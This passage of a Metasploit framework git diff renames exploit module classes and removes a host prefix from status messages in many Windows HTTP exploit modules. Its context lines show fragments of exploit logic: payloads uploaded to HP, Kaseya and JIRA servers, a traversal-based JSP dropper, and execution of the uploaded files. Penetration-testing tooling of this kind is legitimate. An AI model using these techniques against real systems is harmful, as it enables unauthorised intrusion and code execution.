on my tests - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = upload_file(depth, location, jsp_name, payload.encoded) if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/ - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") + print_status("Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', jsp_name), diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 4c5df23135..1049d6673b 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -219,16 +219,16 @@ class Metasploit3 < Msf::Exploit::Remote locations.each {|location| asp_location = location + asp_name - print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...") + print_status("Uploading #{asp.length} bytes to #{location}...") res = upload(asp, asp_location) if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/ - print_good("#{peer} - ASP Payload successfully wrote to #{location}") + print_good("ASP Payload successfully wrote to #{location}") payload_url = asp_location break elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/ - print_error("#{peer} - Error probably due to permissions while writing to #{location}") + print_error("Error probably due to permissions while writing to #{location}") else - print_error("#{peer} - Unknown error while while writing to #{location}") + print_error("Unknown error while while writing to #{location}") end } @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing payload through #{payload_url}...") + print_status("Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 4662a10c1d..2294c8b669 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index acc7ebc703..11a8dad538 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 87bf5d4ac7..da06017e88 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 882ea4523a..e219d739fc 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -121,7 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'max-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 17dc37c388..241ec0cf1a 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'mag-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index 303a6aa930..edff3b0c55 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 867dd837c6..e709be8cf0 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index c0c7a84d27..8982d9bbbe 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index e9e798f40f..7981a0efbc 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index f546994531..cdb57c968e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 5b2d8df90d..8e7e3c1d2b 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index e653bcf3c1..6ac18869d3 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index 054d3c4090..bfe0674871 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index d2c98ea6ba..8632155f8a 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 18fbdce2b0..e6c8376f02 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index e233bfd79b..ebb5c95576 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 75609ae473..d53f58ec5b 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index 44464a26e7..37d8c6bd7d 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 5dec29805a..47d8108ede 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/OpenView.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 691934ac8e..20514989eb 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index e82552a092..e409da7372 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -115,19 +115,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 11ae035e25..92ef605294 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -113,19 +113,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index db9a37d637..0f943908b5 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 3215be533a..2d4f0e3dd0 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index b5f8e8b7af..61e4361241 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote session = get_authenticated_session_id(initial_session, redirect) csrf_token = get_csrf_token(session) - print_status("#{peer} - Executing payload") + print_status("Executing payload") random_mark = Rex::Text.rand_text_alpha(5 + rand(5)) res = send_request_cgi( { @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_initial_session_id - print_status("#{peer} - Retrieving an initial JSESSIONID...") + print_status("Retrieving an initial JSESSIONID...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'), 'method' => 'POST' @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(session_id) - print_status("#{peer} - Authenticating on HP SiteScope Configuration...") + print_status("Authenticating on HP SiteScope Configuration...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'), @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_authenticated_session_id(session_id, redirect) - print_status("#{peer} - Following redirection to finish authentication...") + print_status("Following redirection to finish authentication...") res = send_request_cgi( { @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_csrf_token(session) - print_status("#{peer} - Getting anti-CSRF token...") + print_status("Getting anti-CSRF token...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'), 'cookie' => session @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) end - file = File.join( Msf::Config.data_directory, 'exploits', 'CVE-pending', 'stream.raw') + file = File.join( Msf::Config.data_directory, 'exploits', 'R7_2015_17', 'stream.raw') f = File.new(file, 'rb') stream = Rex::Java::Serialization::Model::Stream.decode(f) diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 61734310a5..9b3c96e2e8 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # The path to the injection is something like: # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index d6802c853e..db7349f2b9 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -19,7 +19,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] } diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index bb0bf66cdc..3c6c307d55 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index d20b2d65ea..858761d5b2 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 7ce4a44b51..20350f46d3 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index fba7ae256a..5fc1f2e280 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index b7e738d5b4..02a2577049 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index eab3afafdd..f8d661fd61 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 1b8962d096..7fa35f9262 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # stack bof, seh, universal ret, auto targeting include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 6cec7edfd1..5015245f56 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] } diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 936bfb0e44..ef301edbab 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index c5ce138480..f77b24d91c 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index de50318045..3d9068f693 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -110,20 +110,20 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}") return true else - print_error("#{peer} - Upload failed...") + print_error("Upload failed...") return false end end def upload_and_run_jsp(filename, contents) - print_status("#{peer} - Getting a valid CSRF token...") + print_status("Getting a valid CSRF token...") csrf_token = get_upload_token fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty? - print_status("#{peer} - Exploiting traversal to upload JSP dropper...") + print_status("Exploiting traversal to upload JSP dropper...") upload_file(filename, contents, csrf_token) - print_status("#{peer} - Executing the dropper...") + print_status("Executing the dropper...") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, filename), @@ -150,15 +150,15 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating EXE...") + print_status("Generating EXE...") exe = payload.encoded_exe @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe" - print_status("#{peer} - Generating JSP dropper...") + print_status("Generating JSP dropper...") dropper = jsp_drop_and_execute(exe, @exe_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading and running JSP dropper...") + print_status("Uploading and running JSP dropper...") upload_and_run_jsp(dropper_filename, dropper) end diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index 00748d0456..4fa901af14 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(payload, path, filename, session_id) - print_status("#{peer} - Uploading payload to #{path}...") + print_status("Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) - print_status("#{peer} - Executing payload #{asp_name}") + print_status("Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index 2839baa385..8037a95ec3 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("SystemTab", "uploadImage.asp") @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}") data = post_data.to_s - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("SystemTab", "uploadImage.asp"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@payload_name) - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(@payload_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index afd75aa97d..e0b5dc2d8d 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < 